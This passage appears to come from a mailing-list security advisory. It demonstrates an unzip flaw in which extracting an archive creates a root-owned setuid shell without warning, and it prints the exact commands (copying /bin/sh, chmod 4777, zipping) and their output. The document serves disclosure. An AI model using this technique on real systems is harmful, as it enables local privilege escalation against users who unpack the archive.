III. Exploit
It's realy easy to test this vulnerability. You can create a malicious ZIP
file following this example:
$ cp /bin/sh . $ chmod 4777 sh $ zip malicious.zip sh
When another user (including root) unpacks the file, a setuid shell file will
be created without any warning, as you can see here:
# id # unzip malicious.zip Archive: malicious.zip inflating: sh # ls -l sh -rwsrwxrwx 1 root root 705148 Jan 16 17:04 sh
-------------------------------------------------- | John M. Simpson - KG4ZOW - Programmer At Large | | http://www.jms1.net/ <jms1@xxxxxxxx> | -------------------------------------------------- | Mac OS X proves that it's easier to make UNIX | | pretty than it is to make Windows secure. | --------------------------------------------------
Attachment:
PGP.sig
Description: This is a digitally signed message part